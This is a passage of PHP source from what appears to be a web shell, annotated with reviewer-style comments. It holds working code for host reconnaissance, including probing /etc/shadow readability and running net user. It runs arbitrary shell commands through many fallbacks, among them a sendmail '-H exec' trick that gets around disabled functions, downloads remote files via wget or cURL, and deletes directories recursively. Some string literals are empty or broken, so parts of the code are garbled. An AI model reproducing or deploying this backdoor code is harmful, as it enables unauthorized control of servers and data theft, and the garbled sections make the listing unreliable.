'; break;
case 'dir' : $b = ''; break;
case 'php' : $b = ''; break;
case 'zip' : $b = ''; break;
case 'img' : $b = ''; break;
case 'txt' : $b = ''; break;
case 'css' : $b = ''; break;
case 'js' : $b = ''; break;
case 'html' : $b = ''; break;
case 'other': $b = ''; break;
case 'info' : $b = ''; break;
case 'edit' : $b = ''; break;
case 'cmd' : $b = ''; break;
case 'bc' : $b = ''; break;
case 'sql' : $b = ''; break;
case 'out' : $b = ''; break;
case 'loader':$b = ''; break;
}
return $b;
}
/**
 * Resolve the directory the script is currently running in.
 *
 * realpath('.') is preferred; getcwd() is the fallback. Each is used only when
 * AvFunc() reports it as callable. Returns '' when neither is usable, and may
 * return false when the chosen call itself fails (errors are suppressed).
 */
function cwd(){
    if(AvFunc(array('realpath'))){
        return @realpath('.');
    }
    if(AvFunc(array('getcwd'))){
        return @getcwd();
    }
    return '';
}
/**
 * List the raw entry names of a directory, including '.' and '..'.
 *
 * Uses the opendir/readdir/closedir family when AvFunc() reports any of the
 * three as usable; otherwise falls back to scandir(). Returns an empty array
 * when the path is not a directory or cannot be opened. In the scandir()
 * branch the (possibly false) result of scandir() is returned as-is.
 */
function listdirs($dir) {
    if(!AvFunc(array('opendir','readdir','closedir'))){
        if(!AvFunc(array('scandir'))){
            return [];
        }
        $listing = @scandir($dir);
        return isset($listing) ? $listing : [];
    }
    $entries = [];
    if(@is_dir($dir) && ($dh = @opendir($dir))){
        while(($name = @readdir($dh)) !== false){
            $entries[] = $name;
        }
        @closedir($dh);
    }
    return $entries;
}
/**
 * Return the names listed in PHP's disable_functions directive.
 *
 * The directive is split on ',' only; entries are not trimmed, so a value
 * written as "exec, system" yields " system" with its leading space.
 * Returns an empty array when ini_get() is missing or the directive is empty.
 */
function disFunc(){
    $raw = '';
    if(function_exists('ini_get')){
        $raw = @ini_get('disable_functions');
    }
    if(empty($raw)){
        return array();
    }
    return explode(',', $raw);
}
/**
 * Report whether at least one of the named functions can be called.
 *
 * A name counts when function_exists() is true and it is not listed by
 * disFunc(). This is an "any of" test, not "all of": callers that pass several
 * names get true as soon as the first usable one is found.
 */
function AvFunc($list = array()){
    foreach($list as $candidate){
        if(!function_exists($candidate)){
            continue;
        }
        if(in_array($candidate, disFunc())){
            continue;
        }
        return true;
    }
    return false;
}
/**
 * Collect a host fingerprint and return it as a list of formatted strings.
 *
 * What the code reads: php_uname(), SERVER_SOFTWARE, the address that
 * $_SERVER['HTTP_HOST'] resolves to, well-known control-panel install
 * directories, open_basedir / safe_mode settings, the PHP version,
 * disable_functions, loaded Apache modules, cURL version and the database
 * client extensions present. On 'nix' it also reads /proc/version and
 * /etc/issue.net and tests whether /etc/passwd and /etc/shadow are readable;
 * otherwise it runs `ver`, `net accounts`, `net user` and `systeminfo` through
 * perintahnya().
 *
 * For a reviewer this is the reconnaissance step of the file: everything
 * gathered here describes how locked down the host is.
 *
 * serverPanel() and showInf() are declared as named functions inside this
 * body, so PHP defines them when serverSecInfo() runs; a second call in the
 * same request would attempt to declare them again.
 *
 * @return array de-duplicated, non-empty entries produced by showInf()
 */
function serverSecInfo(){
// Probe a fixed list of install paths and report the matching panel names.
function serverPanel(){
$pn = array('/usr/local/cpanel' => 'cPanel', '/usr/local/hpanel' => 'hPanel (Hostinger)', '/usr/local/psa' => 'Plesk', '/usr/local/webuzo' => 'Webuzo', '/usr/local/vesta' => 'Vesta CP', '/usr/share/webmin' => 'Virtualmin', '/www/server/panel' => 'aaPanel', '/opt/neoistone' => 'NS Panel', '/etc/neoistone' => 'NS Panel', '/usr/local/neoistone' => 'NS Panel', '/usr/local/mgr5' => 'ISP Manager', '/usr/local/mgr6' => 'ISP Manager', '/usr/local/home/admispconfig' => 'ISP Config', '/usr/local/directadmin' => 'Direct Admin', '/usr/local/solusvm/www' => 'SolusVM', '/usr/local/lxlabs/kloxo' => 'Kloxo', '/usr/local/cwp' => 'CentOS WebPanel', '/usr/local/cwpsrv' => 'CentOS WebPanel', '/var/www/html/froxlor-latest' => 'Froxlor', '/var/www/html/froxlor' => 'Froxlor', '/etc/ajenti/' => 'Ajenti');
foreach($pn as $kpn => $vpn){
if(@is_dir($kpn)){
$npn[] = $vpn;
}
}
return isset($npn) ? implode(', ', array_values(array_unique($npn))) : 'Unknown';
}
// Format one "label: value" entry; returns '' when the trimmed value is falsy.
// NOTE(review): as shown, both ternary branches are empty strings and $v is
// never appended; the original markup was probably lost when this listing
// was extracted. Confirm against an intact copy.
function showInf($n, $v){
$x = '';
$v = trim($v);
if($v){
$x .= ''.$n.':
'; $x .= strpos($v, "\n") == false ? '' : '';
}
return $x;
}
// Database client support: detected purely by function/class presence.
if(AvFunc(array('mysql_get_client_info'))){$temp[] = "MySQL (" . @mysql_get_client_info(). ")";}
if(AvFunc(array('mysqli_get_client_info'))){$temp[] = "MySQLi (" . @mysqli_get_client_info(). ")";}
if(AvFunc(array('mssql_connect'))){$temp[] = "MSSQL";}
if(AvFunc(array('pg_connect'))){$temp[] = "PostgreSQL";}
if(AvFunc(array('oci_connect'))){$temp[] = "Oracle";}
if(AvFunc(array('odbc_connect'))){$temp[] = "odbc";}
if(AvFunc(array('sqlite_open'))){$temp[] = "SQLite";}
if(class_exists('SQLite3')){$temp[] = "SQLite3";}
if(class_exists('PDO')){$temp[] = "PDO";}
$sInfo[] = showInf('System', @php_uname());
$sInfo[] = showInf('Server software', (AvFunc(array('getenv')) ? @getenv('SERVER_SOFTWARE') : 'Unknown'));
// HTTP_HOST is a request header, so the resolved name is client-controlled.
$sInfo[] = showInf('Server ip', (AvFunc(array('gethostbyname')) ? @gethostbyname($_SERVER['HTTP_HOST']) : 'Unknown'));
$sInfo[] = showInf('Server panel', serverPanel());
if(AvFunc(array('ini_get'))){
$sInfo[] = showInf('Open base dir', @ini_get('open_basedir'));
$sInfo[] = showInf('Safe mode', (@ini_get('safe_mode') ? 'ON' : 'OFF'));
$sInfo[] = showInf('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
$sInfo[] = showInf('Safe mode include dir', @ini_get('safe_mode_include_dir'));
}
$sInfo[] = showInf('PHP Version', @phpversion());
$sInfo[] = showInf('Disabled PHP Functions', (count(disFunc())>0 ? implode(', ', disFunc()) : 'none'));
$sInfo[] = showInf('Loaded Apache modules', (AvFunc(array('apache_get_modules')) ? implode(', ', @apache_get_modules()) : '-'));
$sInfo[] = showInf('cURL support', (AvFunc(array('curl_version')) ? 'Yes ('.curl_version()['version'].')' : 'No'));
$sInfo[] = showInf('Databases', (isset($temp) ? implode(', ',$temp) : 'Unknown'));
if($GLOBALS['os'] == 'nix'){
$sInfo[] = showInf('OS Version', (AvFunc(array('file_get_contents')) ? @file_get_contents('/proc/version') : 'Unknown'));
$sInfo[] = showInf('Distro name', (AvFunc(array('file_get_contents')) ? @file_get_contents('/etc/issue.net') : 'Unknown'));
if(AvFunc(array('is_readable'))){
// Only readability is tested here; the files are not opened by this function.
$sInfo[] = showInf('Readable /etc/passwd', (@is_readable('/etc/passwd') ? "Yes" : "No"));
$sInfo[] = showInf('Readable /etc/shadow', (@is_readable('/etc/shadow') ? "Yes" : "No"));
}
} else {
// Non-'nix' branch: each value comes from a command run via perintahnya(),
// whose 'stdout' field is base64-encoded.
$sInfo[] = showInf('OS Version', base64_decode(perintahnya("ver", $_SESSION['path'])['stdout']));
if(AvFunc(array('iconv'))){
$sInfo[] = showInf('Account Settings', @iconv('CP866', 'UTF-8', base64_decode(perintahnya("net accounts", $_SESSION['path'])['stdout'])));
$sInfo[] = showInf('User Accounts', @iconv('CP866', 'UTF-8', base64_decode(perintahnya("net user", $_SESSION['path'])['stdout'])));
$sInfo[] = showInf('System info', @iconv('CP866', 'UTF-8',base64_decode(perintahnya("systeminfo", $_SESSION['path'])['stdout'])));
}
}
return array_values(array_filter(array_unique($sInfo)));
}
/**
 * Fetch the resource at $xurl and write it to "$xpath/$xname".
 *
 * Removes the execution time limit, then tries four mechanisms in order and
 * uses the first one AvFunc() reports usable: file_get_contents() +
 * file_put_contents(), copy(), cURL writing to an fopen() handle, and finally
 * a `wget` command run through perintahnya(). An existing target file is
 * deleted first in every branch.
 *
 * Review notes:
 *  - $xname is joined to $xpath without normalisation, so the final location
 *    is whatever the caller-supplied strings resolve to.
 *  - The first two branches depend on PHP's URL stream wrappers; with
 *    allow_url_fopen disabled they cannot fetch remote URLs. The cURL and
 *    wget branches are independent of that setting and are covered only by
 *    outbound network filtering.
 *
 * @param string $xurl  source URL
 * @param string $xpath destination directory (must be writable)
 * @param string $xname destination file name
 * @return array list of human-readable status strings
 */
function transferFile($xurl, $xpath, $xname){
@set_time_limit(0);
$fName = $xpath."/".$xname;
if(is_writable($xpath)){
if(AvFunc(array('file_put_contents', 'file_get_contents'))){
if(file_exists($fName)){@unlink($fName);}
$upfiles = @file_put_contents($fName, @file_get_contents($xurl));
// file_put_contents() returns the byte count, so a zero-length download
// is reported as a URL failure.
if($upfiles){
$outs[] = file_exists($fName) ? $xname." uploaded!" : $xname." failed!";
} else {
$outs[] = "handling url failed!";
}
} else if(AvFunc(array('copy'))){
if(file_exists($fName)){@unlink($fName);}
$outs[] = @copy($xurl, $fName) ? $xname." uploaded!" : $xname." failed!";
} else if(AvFunc(array('curl_version', 'fopen', 'fclose'))){
if(file_exists($fName)){@unlink($fName);}
$ch = curl_init($xurl);
$fp = @fopen($fName, 'w');
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
@fclose($fp);
// Success is judged only by the file existing, not by the transfer result.
$outs[] = file_exists($fName) ? $xname." uploaded!" : $xname." failed!";
} else {
if(file_exists($fName)){@unlink($fName);}
// $xurl and $xname are concatenated into the shell command unescaped.
$sendreq = perintahnya('wget -c '.$xurl.' -O '.$xname, $xpath);
$outs[] = isset($sendreq['stdout']) && strlen($sendreq['stdout'])>2 ? $xname." uploaded!" : $xname." failed!";
}
} else {
$outs[] = $xname.' failed!';
}
return isset($outs) ? $outs : array($xname.' failed!');
}
/**
 * Add every file and sub-directory under $dir to an open archive.
 *
 * Does nothing when the ZipArchive class is unavailable. Entry names are
 * built as "$dir/<sub path>", so the archive keeps the directory path exactly
 * as it was passed in. $basePath is accepted but not used.
 *
 * @param object $zip      archive exposing addEmptyDir() and addFile()
 * @param string $dir      directory to walk recursively
 * @param string $basePath unused
 */
function addDirToZip($zip, $dir, $basePath){
    if(!class_exists('ZipArchive')){
        return;
    }
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, RecursiveDirectoryIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach($walker as $node){
        $entryName = $dir . '/' . $walker->getSubPathName();
        if($node->isDir()){
            $zip->addEmptyDir($entryName);
            continue;
        }
        $zip->addFile($node->getRealPath(), $entryName);
    }
}
/**
 * Obfuscate $value with a repeating key derived from $keys.
 *
 * The key is the hex string sha1($keys). For each byte of $value the byte's
 * ordinal and the ordinal of the next key character (cycling) are added, the
 * sum is converted to base 36, the digits are reversed and appended.
 * Returns false when $value is falsy (including '' and '0').
 *
 * This is a reversible additive transform, not encryption: there is no
 * integrity check, and anyone who knows $keys can undo it with decode().
 */
function encode($value,$keys) {if(!$value){return false;}$key = sha1($keys);$strLen = strlen($value);$keyLen = strlen($key);$j = 0;$crypttext = ''; for ($i = 0; $i < $strLen; $i++) {$ordStr = ord(substr($value, $i, 1));if ($j == $keyLen) {$j = 0;}$ordKey = ord(substr($key, $j, 1));$j++;$crypttext .= strrev(base_convert(dechex($ordStr + $ordKey), 16, 36));}return $crypttext;}
/**
 * Reverse the transform applied by encode().
 *
 * Reads $value two characters at a time, reverses each pair, converts it from
 * base 36 and subtracts the ordinal of the next character of sha1($keys)
 * (cycling) to recover one byte. Returns false when $value is falsy.
 *
 * The fixed step of two assumes every encoded unit is exactly two characters
 * long; input not produced by encode() is not validated.
 */
function decode($value,$keys) {if(!$value){return false;}$key = sha1($keys);$strLen = strlen($value);$keyLen = strlen($key);$j = 0;$decrypttext = '';for ($i = 0; $i < $strLen; $i += 2) {$ordStr = hexdec(base_convert(strrev(substr($value, $i, 2)), 36, 16));if ($j == $keyLen) {$j = 0;}$ordKey = ord(substr($key, $j, 1));$j++;$decrypttext .= chr($ordStr - $ordKey);}return $decrypttext;}
/**
 * Dispatch to encode() or decode() using a key taken from global state.
 *
 * The key material is $GLOBALS['stitle'] with every character outside
 * a-z/A-Z removed. $_a1a selects the direction: the exact string 'encode'
 * encodes, any other value decodes. $_a2a is the payload.
 */
function generate($_a1a,$_a2a){ return $_a1a == 'encode' ? encode($_a2a,preg_replace('/[^a-zA-Z]/','',$GLOBALS['stitle'])) : decode($_a2a,preg_replace('/[^a-zA-Z]/','',$GLOBALS['stitle']));}
/**
 * Run $cmd with proc_open() and echo what it produced.
 *
 * stdout is drained first, then stderr, in chunks of $GLOBALS['chunk_size'];
 * stdout is echoed when non-empty, otherwise stderr. Nothing is returned: the
 * output is echoed, and ex() captures it with ob_start()/ob_get_clean().
 *
 * $cmd is handed to proc_open() as a single string, so it is interpreted by
 * the system shell. The stdin pipe (descriptor 0) is opened but never written
 * to or closed explicitly.
 */
function procopen($cmd){
// Descriptor spec: 0 = stdin (child reads), 1 = stdout, 2 = stderr (child writes).
$descspek = array(
1 => array("pipe", "w"),
0 => array("pipe", "r"),
2 => array("pipe", "w")
);
try {
if(AvFunc(array('proc_open','proc_close','fread','feof','fclose'))){
$process = @proc_open($cmd, $descspek, $pipes);
if(is_resource($process)){
$stdout = ""; $buffer = "";
do {
$buffer = fread($pipes[1], $GLOBALS['chunk_size']); $stdout = $stdout . $buffer;
} while ((!feof($pipes[1])) && (strlen($buffer) != 0));
$stderr = ""; $buffer = "";
do {
$buffer = fread($pipes[2], $GLOBALS['chunk_size']); $stderr = $stderr . $buffer;
} while ((!feof($pipes[2])) && (strlen($buffer) != 0));
fclose($pipes[1]);
fclose($pipes[2]);
$outr = !empty($stdout) ? $stdout : $stderr;
} else {
$outr = 'Gagal eksekusi pak!, proc_open failed!';
}
// Reached on both paths, including when proc_open() did not return a resource.
proc_close($process);
} else {
$outr = 'PHP proc_open function is disabled or no exists!';
}
echo $outr;
} catch(Exception $err){
echo 'error: '.$err->getMessage();
}
}
/**
 * Indirect command path that goes through mail() or mb_send_mail().
 *
 * Writes a small /bin/sh script containing "$cmd > <tmp>/geiss.txt" to
 * <tmp>/geiss.sh via cf(), marks it mode 0777, then calls the mail function
 * with an extra-parameters string that refers to that script. The fifth
 * argument of mail()/mb_send_mail() is appended to the command line of the
 * configured sendmail binary, which is what this relies on.
 *
 * Review notes:
 *  - Artefacts left on disk: geiss.sh and geiss.txt in sys_get_temp_dir().
 *  - The result of file_get_contents() on geiss.txt is discarded, so this
 *    function itself returns no command output; it returns the value of
 *    sleep(5), or null when the temp directory is not writable.
 *  - Hardening: hosts that do not send mail from PHP can list mail and
 *    mb_send_mail in disable_functions, which removes this path.
 *
 * @param string $func 'mail' selects mail(); anything else uses mb_send_mail()
 * @param string $cmd  command text written into the script, unescaped
 */
function fakemail($func, $cmd){
$tmpdir = str_replace('\\','/', @sys_get_temp_dir());
if(is_writable($tmpdir)){
$cmds = "{$cmd} > {$tmpdir}/geiss.txt";
// cf() expects base64 input and decodes it before writing.
cf($tmpdir.'/geiss.sh', base64_encode(@iconv("UTF-8", "ISO-8859-1//IGNORE", addcslashes("#!/bin/sh\n{$cmds}","\r\t\0"))));
@chmod($tmpdir.'/geiss.sh', 0777);
if($func == 'mail'){
$send = @mail("root@root", "", "", "", '-H \"exec '.$tmpdir.'/geiss.sh\"');
} else {
$send = @mb_send_mail("root@root", "", "", "", '-H \"exec '.$tmpdir.'/geiss.sh\"');
}
if($send){@file_get_contents($tmpdir."/geiss.txt");}
return sleep(5);
}
}
/**
 * Write base64-decoded content to a file, truncating any existing file.
 *
 * Uses fopen()/fwrite() (with fputs() as the `or` fallback) when AvFunc()
 * reports any of that family usable, otherwise file_put_contents(). All
 * errors are suppressed and nothing is returned, so the caller cannot tell
 * whether the write succeeded.
 *
 * @param string $f destination path, used as given
 * @param string $t base64-encoded content
 */
function cf($f,$t){
if(AvFunc(array('fopen','fwrite','fputs','fclose'))){
$w=@fopen($f,"w");
if($w){
@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t));
@fclose($w);
}
} else {
if(AvFunc(array('file_put_contents'))){
@file_put_contents($f,@base64_decode($t));
}
}
}
/**
 * Expand a leading "~" or "~user" in $path; other paths are returned as-is.
 *
 * NOTE(review): perintahnya() is declared as perintahnya($cmdx, $path) and
 * returns an array. Here its second argument is the undefined $stdout, passed
 * by value, and the return value is ignored, so $stdout[0] is read from a
 * variable the call cannot have filled. As written the expansion looks
 * ineffective; confirm against the caller's expectations.
 */
function expandPath($path) {
if(preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)){ perintahnya("echo $match[1]", $stdout); return $stdout[0] . $match[2];}
return $path;
}
/**
 * Run one command line relative to $path and return a prompt-style result.
 *
 * `cd` is handled in-process with chdir() so the directory change persists
 * for the rest of the request: a bare `cd` goes to expandPath("~"), and
 * `cd <target>` first enters $path and then the target. Every other command
 * is executed by ex() after chdir($path). If chdir is not usable according to
 * AvFunc(), nothing is executed and stdout stays empty.
 *
 * Side effect: $_SESSION['path'] is overwritten with the current directory
 * (or DOCUMENT_ROOT when getcwd is unavailable).
 *
 * @param string $cmdx command line, passed to ex() unmodified
 * @param string $path directory to run in
 * @return array 'userhost', 'path' and 'stdout', each base64-encoded
 */
function perintahnya($cmdx, $path){
$stdout = '';
if(AvFunc(array('chdir'))){
if(preg_match("/^\s*cd\s*(2>&1)?$/", $cmdx)){
@chdir(expandPath("~"));
} else if(preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmdx)){
@chdir($path);
// Second, stricter match: only the first whitespace-free token is used as
// the target. $match is read without checking that this match succeeded.
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmdx, $match);
@chdir(expandPath($match[1]));
} else {
@chdir($path);
$stdout = ex($cmdx);
}
}
// Defaults used when the real user or host name cannot be determined.
$cfg = array('username' => 'Z190T', 'hostname' => 'shell');
if($GLOBALS['os'] == 'nix'){
if(AvFunc(array('posix_getpwuid','posix_geteuid'))){ $pwuid = @posix_getpwuid(@posix_geteuid());if($pwuid !== false){ $cfg['username'] = $pwuid['name'];}}
} else {
if(AvFunc(array('getenv'))){ $username = @getenv('USERNAME');if($username !== false){ $cfg['username'] = $username;}}
}
if(AvFunc(array('gethostname'))){ $hostname = @gethostname(); if($hostname !== false){ $cfg['hostname'] = $hostname;}}
$_SESSION['path'] = AvFunc(array('getcwd')) ? str_replace('\\','/', cwd()) : $_SERVER['DOCUMENT_ROOT'];
return array('userhost' => base64_encode($cfg['username']."@".$cfg['hostname']), 'path' => base64_encode($_SESSION['path']), 'stdout' => base64_encode($stdout));
}
/**
 * Execute a command string and return its output as text.
 *
 * " 2>&1" is appended unless the command already contains "2>". The first
 * attempt uses the backtick operator, which is the same facility as
 * shell_exec(). Only when that yields no output does the function walk a
 * fixed list of alternatives and stop at the first one AvFunc() accepts.
 *
 * Hardening note: the list in the foreach below is the complete set of entry
 * points this code depends on. A disable_functions policy has to cover every
 * name in it, including mail and mb_send_mail, for this function to be left
 * with nothing to call.
 *
 * @param string $init command line, executed without any escaping
 * @return string command output, or a fixed failure message
 */
function ex($init){
$out = '';
if(!preg_match('/2>/', $init)){$init.=' 2>&1';}
$tmpout = `$init`;
if(strlen($tmpout)>0){
$out = $tmpout;
} else {
foreach(array('proc_open', 'popen', 'exec', 'passthru', 'system', 'shell_exec', 'mail', 'mb_send_mail') as $c){
if($c == 'proc_open'){
// procopen() echoes, so its output is captured through the output buffer.
if(AvFunc(array($c, 'ob_start', 'ob_get_clean'))){ob_start(); procopen($init); $out=ob_get_clean(); break;}
} else if($c == 'exec'){
if(AvFunc(array($c))){@$c($init,$outs); $out=@join("\n",$outs); break;}
} else if($c == 'system' || $c == 'passthru'){
// AvFunc() is an "any of" test, so this can pass on a name other than $c.
if(AvFunc(array('system', 'passthru', 'ob_start', 'ob_get_clean'))){ob_start(); @$c($init); $out=ob_get_clean(); break;}
} else if($c == 'shell_exec'){
if(AvFunc(array($c))){$out=$c($init); break;}
} else if($c == 'mail' || $c == 'mb_send_mail'){
if(AvFunc(array('mail', 'mb_send_mail', 'ob_start', 'ob_get_clean'))){ob_start(); fakemail("{$c}",$init); $out=ob_get_clean(); break;}
} else {
// Remaining name in the list is 'popen': read the pipe until EOF.
if(AvFunc(array($c, 'feof', 'fread', 'fclose'))){if(is_resource($f = @$c($init, "r"))){$out=''; while(!@feof($f)){$out.=fread($f, $GLOBALS['chunk_size']);}fclose($f);} break;}
}
}
if(strlen($out)<=0){
$out = 'gak bisa jalanin perintah, coba cek disable_functions server ini!';
}
}
return $out;
}
/**
 * Render a file's mode as an `ls -l` style string such as "-rw-r--r--".
 *
 * The first character is the file type (s, l, -, b, d, c, p, or u when no
 * type bit matches); the next nine are the owner, group and world triads,
 * with setuid/setgid shown as s/S and the sticky bit as t/T.
 * When fileperms() fails the result is "u---------".
 */
function statusnya($file){
    $mode = @fileperms($file);

    // Checked in this order; the first mask fully contained in the mode wins.
    $typeMap = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => '-', // regular file
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $text = 'u';
    foreach($typeMap as $mask => $letter){
        if(($mode & $mask) == $mask){
            $text = $letter;
            break;
        }
    }

    // read bit, write bit, execute bit, special bit, letter with x, letter without x
    $triads = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
    );
    foreach($triads as $triad){
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;
        $text .= ($mode & $readBit) ? 'r' : '-';
        $text .= ($mode & $writeBit) ? 'w' : '-';
        if($mode & $execBit){
            $text .= ($mode & $specialBit) ? $withExec : 'x';
        } else {
            $text .= ($mode & $specialBit) ? $withoutExec : '-';
        }
    }
    return $text;
}
/**
 * Map a path's access level to a CSS class name.
 *
 * 'text-danger' when the path is not readable, 'text-warning' when it is
 * readable but not writable, 'text-success' when it is both.
 */
function stColor($f){
    if(!@is_readable($f)){
        return 'text-danger';
    }
    return @is_writable($f) ? 'text-success' : 'text-warning';
}
/**
 * Look up the owning user and group of a file.
 *
 * Starts from fileowner()/filegroup() (or '?' when those are unavailable) and
 * translates the ids to names through posix_getpwuid()/posix_getgrgid() when
 * AvFunc() reports them usable. A failed name lookup yields '?'.
 *
 * @return array with keys 'owner' and 'group'
 */
function owner($filename){
    $uid = AvFunc(array('fileowner')) ? @fileowner($filename) : '?';
    $gid = AvFunc(array('filegroup')) ? @filegroup($filename) : '?';

    if(AvFunc(array('posix_getpwuid'))){
        $pw = @posix_getpwuid($uid);
        $uid = isset($pw['name']) ? $pw['name'] : '?';
    }
    if(AvFunc(array('posix_getgrgid'))){
        $gr = @posix_getgrgid($gid);
        $gid = isset($gr['name']) ? $gr['name'] : '?';
    }

    return array('owner' => $uid, 'group' => $gid);
}
/**
 * Format a byte count with a binary unit suffix, e.g. 1536 -> "1.5 KB".
 *
 * Divides by 1024 until the value drops below 1024 or the largest unit (PB)
 * is reached, then rounds to two decimals.
 */
function sizeFilter($bytes){
    $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB');
    $last = count($units) - 1;
    $idx = 0;
    while($bytes >= 1024 && $idx < $last){
        $bytes /= 1024;
        $idx++;
    }
    return round($bytes, 2) . " " . $units[$idx];
}
/**
 * Count the entries in a directory, excluding '.' and '..'.
 *
 * The subtraction of 2 is unconditional, so a directory that listdirs()
 * cannot read (empty list) is reported as -2.
 */
function countDir($filename){
    $entries = listdirs($filename);
    return @count($entries) - 2;
}
/**
 * Recursively delete a directory and everything below it.
 *
 * Does nothing when listdirs() returns an empty or falsy list. is_dir()
 * follows symbolic links, so a link that points at a directory is descended
 * into and the contents of its target are removed as well. Errors from
 * unlink() are suppressed; the final rmdir() is not.
 */
function xrmdir($dir){
    $entries = listdirs($dir);
    if(!$entries){
        return;
    }
    foreach($entries as $name){
        if($name !== '.' && $name !== '..'){
            $child = $dir.'/'.$name;
            if(@is_dir($child)){
                xrmdir($child);
            } else {
                @unlink($child);
            }
        }
    }
    rmdir($dir);
}
/**
 * Recursively copy a directory tree.
 *
 * Creates $destination (mode 0777, recursive) when it does not exist, then
 * copies files and recurses into sub-directories. Failures of mkdir() and
 * copy() are suppressed, so a true return only means $source was a directory,
 * not that every file was copied.
 *
 * @return bool false when $source is not a directory, otherwise true
 */
function gandakanDir($source, $destination) {
    if(!@is_dir($source)){
        return false;
    }
    if(!file_exists($destination)){
        @mkdir($destination, 0777, true);
    }
    foreach(listdirs($source) as $name){
        if($name === '.' || $name === '..'){
            continue;
        }
        $from = $source . '/' . $name;
        $to = $destination . '/' . $name;
        if(@is_dir($from)){
            gandakanDir($from, $to);
            continue;
        }
        @copy($from, $to);
    }
    return true;
}
/**
 * Return the entries of directory $a, directories first, then by name.
 *
 * Each row has 'type' ('dir' or 'file'), 'entry' (the bare name),
 * 'entry_path' (the directory that was listed) and 'full_path'.
 * '.' and '..' are left out. An unreadable or empty directory gives [].
 */
function urutberkas($a){
    $names = listdirs($a);
    $rows = array();
    if(!is_array($names) || count($names) <= 0){
        return $rows;
    }
    foreach($names as $name){
        if(in_array($name, array('.', '..'))){
            continue;
        }
        $full = $a.'/'.$name;
        $rows[] = array(
            'type' => @is_dir($full) ? 'dir' : 'file',
            'entry' => $name,
            'entry_path' => $a,
            'full_path' => $full,
        );
    }
    // 'dir' sorts before 'file'; ties are broken by entry name.
    $types = array_column($rows, 'type');
    $entryNames = array_column($rows, 'entry');
    array_multisort($types, SORT_ASC, $entryNames, SORT_ASC, $rows);
    return $rows;
}
// Builds output for the path $a after splitting it on '/'; when the split
// yields nothing it returns a fixed "cannot read this directory" message.
// NOTE(review): the first assignment to $outs is damaged in this listing (the
// string opens with a single quote and closes with a double quote), so the
// markup it originally built is not recoverable here and the function does
// not parse as shown. Compare with an intact copy before drawing conclusions.
function pathberkas($a){
$lb = explode('/', $a);
if(isset($lb) && count($lb)>0){
$outs = '";
} else {
$outs = "gak bisa baca direktori ini gess..";
}
return $outs;
}
/**
 * Render the file-manager listing for directory $fm as one output string.
 *
 * Rows come from urutberkas() (directories first). For each entry the
 * function gathers owner/group via owner(), a size or item count, the
 * modification time, the symbolic mode from statusnya() and the last four
 * octal digits of fileperms(). stColor() decides which variant of the link
 * and action cells is used, based on whether the entry is readable/writable.
 * A footer with directory and file totals is appended.
 *
 * NOTE(review): most string literals below are empty or contain only table
 * separators; the markup they held appears to have been lost when this
 * listing was extracted. Entry names are interpolated into the output as
 * they are; no escaping is visible in the lines shown.
 *
 * @param string $fm directory to list
 * @return string the assembled table text
 */
function FManager($fm){
$lokasinya = urutberkas($fm);
$fmtable = "";
$fmtable .= "
";
$fmtable .= "| Name | Modified | User/Group | Permission | Options |
";
$fmtfoot = "";
$cDir = 0; $cFile = 0;
if(count($lokasinya)>0){
$nDirsd = "";
foreach($lokasinya as $kl => $dir){
$nDirsd = $dir['entry_path'];
$owner = owner($dir['full_path']);
// Directories show an item count, files a human-readable size.
$fSize = $dir['type'] == 'dir' ? countDir($dir['full_path']) . " items" : sizeFilter(@filesize($dir['full_path']));
if($dir['type'] == 'dir'){
$cDir += 1;
$zadd = "";
if(class_exists('ZipArchive')){
$zadd .= "";
}
$zadd .= "";
$zadd .= "";
$txcol = stColor($dir['full_path']);
switch($txcol){
case 'text-danger' : $dlinks = "{$dir['entry']}"; break;
case 'text-warning' : $dlinks = "{$dir['entry']}"; break;
case 'text-success' :$dlinks = "{$dir['entry']}"; break;
}
if(!in_array($dir['entry'], array('.', '..'))){
switch($txcol){
case 'text-danger' : $formper = "".statusnya($dir['full_path']).""; $formsel = "-"; break;
case 'text-warning' : $formper = "".statusnya($dir['full_path']).""; $formsel = "-"; break;
case 'text-success' :
$formper = "" . statusnya($dir['full_path']) . "";
$formsel = "";
break;
default : $formper = statusnya($dir['full_path']); $formsel = "-";
}
} else {
$formper = statusnya($dir['full_path']);
$formsel = "";
}
// Append the numeric mode, e.g. "0755".
$formper .= "".substr(sprintf("%o", @fileperms($dir['full_path'])),-4)."";
$fmtable .= "
|
|
|
".date('Y-m-d H:i:s', @filemtime($dir['full_path']))." |
{$owner['owner']}/{$owner['group']} |
{$formper} |
{$formsel} |
";
} else {
$cFile += 1;
$fcolor = stColor($dir['full_path']);
switch($fcolor){
case 'text-danger' : $flinks = "".statusnya($dir['full_path']).""; break;
case 'text-warning' : $flinks = "".statusnya($dir['full_path']).""; break;
case 'text-success' :$flinks = "" . statusnya($dir['full_path']) . ""; break;
}
$flinks .= "".substr(sprintf("%o", @fileperms($dir['full_path'])),-4)."";
$zadd = "";
$ext = pathinfo($dir['full_path'], PATHINFO_EXTENSION);
if(!empty($ext)){
// Pick an icon by lower-cased extension via fType().
switch(strtolower(ucwords($ext))){
case'css': case'less': $ftype = fType('css','1.5em'); break;
case'txt': case'ini': $ftype = fType('txt'); break;
case'js': case'json': $ftype = fType('js','1.8em'); break;
case'php': case'phtml': case'php5': case'php7': case'phar': case'inc': case'module': case'hphp': case'ctp': case'hphp': $ftype = fType('php'); break;
case'html': case'htm': case'shtml': case'xhtml': case'xml': $ftype = fType('html'); break;
